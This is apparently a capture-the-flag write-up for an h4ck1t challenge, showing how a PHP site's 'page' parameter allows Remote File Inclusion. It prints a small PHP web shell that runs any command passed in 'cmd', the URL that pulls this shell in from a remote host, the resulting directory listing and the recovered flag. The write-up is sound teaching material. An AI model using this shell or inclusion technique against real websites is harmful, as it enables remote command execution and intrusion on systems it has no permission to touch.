Description
RU:
У наших иностранных партнеров проблемы с квалифицированными кадрами в области информационных технологий, мы решили им помочь и провести удаленное тестирование их нового сайта. Ваша задача найти дыру в их системе и захватить какую-то информацию для подтверждения взлома. Удачи…http://91.231.84.36:9150/
h4ck1t{}EN:
Our foreign partners have some problems with qualified staff in the field of information technology, we decided to help them and to conduct remote testing of their new website. Your task is to find a hole in the system and grab some information to confirm the hack .Good luck !
http://91.231.84.36:9150/
h4ck1t{}
Solution
At the time of writing, the target is not online anymore. Therefore, some details might not be included.
The target was a normal looking website. It did not have too much interesting user interaction etc., except for three pages (which I believe were home, about and contact). The pages were accessible on URLs that looked like this:
1 |
http://91.231.84.36:9150/index.php?page=about |
Of course, first thing to do is mess around with the page parameter here. Doing this would result in an empty page. After trying external URLs too, it seemed that some of the code present on those URLs was actually rendered within the target’s website itself. It thus seemed we were dealing with a Remote File Inclusion (RFI) vulnerability here.
After a couple of tries, it seemed the following PHP shell, hosted somewhere else, could be executed automatically if saved as plain text on the remote location:
1 2 3 4 5 6 |
<?php echo "<script>alert(SNEAKY LOS3RS 0wn3d U !!!);</script>"; echo "Run command: ".htmlspecialchars($_GET['cmd']); system($_GET['cmd']); ?> |
Now, the shell would look for any command specified using the cmd parameter in the GET request. The following URL was used to run the ls command on the target server’s current directory:
1 |
http://91.231.84.36:9150/index.php?cmd=ls&page=<path_to_remote_host>/hack.txt? |
It would present the following output:
1 |
Run command: lsabout.php contact.php css fonts index.php js php.ini services.php sup3r_$3cr3t_f1le.php |
As it seemed, the page=about would lead to about.php. Therefore, page=sup3r_$3cr3t_f1le should theoretically lead to sup3r_$3cr3t_f1le.php. Let’s try that by visiting the following URL in a browser:
1 |
http://91.231.84.36:9150/index.php?page=sup3r_$3cr3t_f1le |
Output:
1 |
FLAG: h4ck1t{g00d_rfi_its_y0ur_fl@g} |
So, the flag is h4ck1t{g00d_rfi_its_y0ur_fl@g}.